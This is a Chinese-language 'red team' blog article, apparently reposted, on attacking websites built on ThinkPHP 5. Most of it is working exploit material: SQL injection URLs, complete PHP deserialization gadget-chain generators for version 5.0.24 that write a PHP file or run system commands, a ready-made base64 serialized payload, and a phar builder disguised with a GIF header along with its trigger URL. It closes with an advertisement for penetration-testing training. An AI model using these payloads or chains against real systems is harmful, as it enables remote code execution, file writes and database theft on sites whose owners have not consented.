红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化
红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化1介绍thinkphp框架开发的网站特别的多,如一些骗子站,传销站,还有一些网站cms都是基于整个框架。这里主要针对th 2022-9-28 13:6:32 Author: moonsec(查看原文) 阅读量:38 收藏
红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化1介绍thinkphp框架开发的网站特别的多,如一些骗子站,传销站,还有一些网站cms都是基于整个框架。这里主要针对th 2022-9-28 13:6:32 Author: moonsec(查看原文) 阅读量:38 收藏
1介绍
thinkphp框架开发的网站特别的多,如一些骗子站,传销站,还有一些网站cms都是基于整个框架。
这里主要针对thinkphp5这个版本。基于这个框架开发的产品特别多。
2常见漏洞
1.SQL注入1
<?phpnamespace app\index\controller;use think\Db;class Index{//sqli注入public function test3(){echo "test3";$id = input('id');$result = Db::name('users')->where("id = {$id}")->select();echo "<pre>";var_dump($result);echo "</pre>";}}
http://www.tp5024.com/index.php/index/index/test3/id/1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)2.SQL注入2
<?phpnamespace app\index\controller;use think\Db;class Index{public function index(){$username = request()->get('username');$result = db('users')->where('username','exp',$username)->select();echo "<pre>";var_dump($result);echo "</pre>";}}
http://www.tp123.com/index.php?m=index&c=index&username=)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%233.thinkphp5 反序列化写文件
这里就以 thinkphp5.0.24 这个版本 其他版本大同小异
<?phpnamespace think\process\pipes{use think\model\Pivot;use think\cache\driver\Memcached;class Windows{private $files = [];public function __construct($path,$data){$this->files = [new Pivot($path,$data)];}}$data = base64_encode('<?php phpinfo();?>');echo "tp5.0.24 write file pop Chain\n";echo "The '=' cannot exist in the data,please check:".$data."\n";$path = 'php://filter/convert.base64-decode/resource=./';$aaa = new Windows($path,$data);echo base64_encode(serialize($aaa));echo "\n";echo 'filename:'.md5('tag_'.md5(true)).'.php';}namespace think{abstract class Model{}}namespace think\model{use think\Model;class Pivot extends Model{protected $append = [];protected $error;public $parent;public function __construct($path,$data){$this->append['jelly'] = 'getError';$this->error = new relation\BelongsTo($path,$data);$this->parent = new \think\console\Output($path,$data);}}abstract class Relation{}}namespace think\model\relation{use think\db\Query;use think\model\Relation;abstract class OneToOne extends Relation{}class BelongsTo extends OneToOne{protected $selfRelation;protected $query;protected $bindAttr = [];public function __construct($path,$data){$this->selfRelation = false;$this->query = new Query($path,$data);$this->bindAttr = ['a'.$data];}}}namespace think\db{use think\console\Output;class Query{protected $model;public function __construct($path,$data){$this->model = new Output($path,$data);}}}namespace think\console{use think\session\driver\Memcache;class Output{protected $styles = [];private $handle;public function __construct($path,$data){$this->styles = ['getAttr'];$this->handle = new Memcache($path,$data);}}}namespace think\session\driver{use think\cache\driver\File;use think\cache\driver\Memcached;class Memcache{protected $handler = null;protected $config = ['expire' => '','session_name' => '',];public function __construct($path,$data){$this->handler = new Memcached($path,$data);}}}namespace think\cache\driver{class Memcached{protected $handler;protected $tag;protected $options = [];public function __construct($path,$data){$this->options = ['prefix' => ''];$this->handler = new File($path,$data);$this->tag = true;}}}namespace think\cache\driver{class File{protected $options = [];protected $tag;public function __construct($path,$data){$this->tag = false;$this->options = ['expire' => 0,'cache_subdir' => false,'prefix' => '','path' => $path,'data_compress' => false,];}}}
在代码审计里如果发现unserialize这个函数传入的参数可控 就可以进行利用了 通常的情况下 是
unserialize(加密函数(传入值)) 这种模式居多 这里就以这个为例子。
<?phpnamespace app\index\controller;class Index{public function index(){return "thinkphp 5.0.24";}//反序列化public function test1(){$id = unserialize(base64_decode($_GET['data']));var_dump($id);}//反序列化 pharpublic function test2(){echo file_get_contents($_GET['file']);}}
http://www.tp5024.com/index.php/index/index/test1?data=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.thinkphp5 phar反序列化
首先 php里要关闭这个只读模式
thinkphp5.0.24 还有其他链子
<?phpnamespace think\process\pipes{use think\model\Pivot;ini_set('display_errors',1);class Windows{private $files = [];public function __construct($function,$parameter){$this->files = [new Pivot($function,$parameter)];}}$aaa = new Windows('system','whoami');echo base64_encode(serialize($aaa));}namespace think{abstract class Model{}}namespace think\model{use think\Model;use think\console\Output;class Pivot extends Model{protected $append = [];protected $error;public $parent;public function __construct($function,$parameter){$this->append['jelly'] = 'getError';$this->error = new relation\BelongsTo($function,$parameter);$this->parent = new Output($function,$parameter);}}abstract class Relation{}}namespace think\model\relation{use think\db\Query;use think\model\Relation;abstract class OneToOne extends Relation{}class BelongsTo extends OneToOne{protected $selfRelation;protected $query;protected $bindAttr = [];public function __construct($function,$parameter){$this->selfRelation = false;$this->query = new Query($function,$parameter);$this->bindAttr = [''];}}}namespace think\db{use think\console\Output;class Query{protected $model;public function __construct($function,$parameter){$this->model = new Output($function,$parameter);}}}namespace think\console{use think\session\driver\Memcache;class Output{protected $styles = [];private $handle;public function __construct($function,$parameter){$this->styles = ['getAttr'];$this->handle = new Memcache($function,$parameter);}}}namespace think\session\driver{use think\cache\driver\Memcached;class Memcache{protected $handler = null;protected $config = ['expire' => '','session_name' => '',];public function __construct($function,$parameter){$this->handler = new Memcached($function,$parameter);}}}namespace think\cache\driver{use think\Request;class Memcached{protected $handler;protected $options = [];protected $tag;public function __construct($function,$parameter){// pop链中需要prefix存在,否则报错$this->options = ['prefix' => 'jelly/'];$this->tag = true;$this->handler = new Request($function,$parameter);}}}namespace think{class Request{protected $get = [];protected $filter;public function __construct($function,$parameter){$this->filter = $function;$this->get = ["jelly"=>$parameter];}}}
这个是命令执行的 将它改成 phar 生成的包
<?phpnamespace think\process\pipes{use think\model\Pivot;ini_set('display_errors',1);class Windows{private $files = [];public function __construct($function,$parameter){$this->files = [new Pivot($function,$parameter)];}}}namespace {use think\process\pipes\Windows;$data= new Windows('system', 'whoami');unlink('exp2.phar');$phar = new Phar('exp2.phar');$phar -> stopBuffering();$phar->setStub("GIF89a"."<?php __HALT_COMPILER();?>");//设置stub$phar -> addFromString('test.txt','test');$object = $data;$phar -> setMetadata($object);$phar -> stopBuffering();}namespace think{abstract class Model{}}namespace think\model{use think\Model;use think\console\Output;class Pivot extends Model{protected $append = [];protected $error;public $parent;public function __construct($function,$parameter){$this->append['jelly'] = 'getError';$this->error = new relation\BelongsTo($function,$parameter);$this->parent = new Output($function,$parameter);}}abstract class Relation{}}namespace think\model\relation{use think\db\Query;use think\model\Relation;abstract class OneToOne extends Relation{}class BelongsTo extends OneToOne{protected $selfRelation;protected $query;protected $bindAttr = [];public function __construct($function,$parameter){$this->selfRelation = false;$this->query = new Query($function,$parameter);$this->bindAttr = [''];}}}namespace think\db{use think\console\Output;class Query{protected $model;public function __construct($function,$parameter){$this->model = new Output($function,$parameter);}}}namespace think\console{use think\session\driver\Memcache;class Output{protected $styles = [];private $handle;public function __construct($function,$parameter){$this->styles = ['getAttr'];$this->handle = new Memcache($function,$parameter);}}}namespace think\session\driver{use think\cache\driver\Memcached;class Memcache{protected $handler = null;protected $config = ['expire' => '','session_name' => '',];public function __construct($function,$parameter){$this->handler = new Memcached($function,$parameter);}}}namespace think\cache\driver{use think\Request;class Memcached{protected $handler;protected $options = [];protected $tag;public function __construct($function,$parameter){// pop链中需要prefix存在,否则报错$this->options = ['prefix' => 'jelly/'];$this->tag = true;$this->handler = new Request($function,$parameter);}}}namespace think{class Request{protected $get = [];protected $filter;public function __construct($function,$parameter){$this->filter = $function;$this->get = ["jelly"=>$parameter];}}}
找个地方上传 审计文件操作函数 然后传入就可以了。
一般的方法是上传图片 再用phar访问就能触发了
http://www.tp5024.com/index.php/index/index/test2?file=phar://exp2.gif/test.txt3关注公众号
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏
4关于培训
需要渗透测试培训可联系暗月
手机扫一扫 即可添加好友咨询
课程详细介绍点击下面连接即可了解
暗月渗透测试课程更新
文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653583153&idx=1&sn=53e17b32f153e836f86e506db02542ce&chksm=811b6173b66ce8656a289000e6416d6a3e7c289c5212eb9ae730fffa7b8be870582d7dbc3d15#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh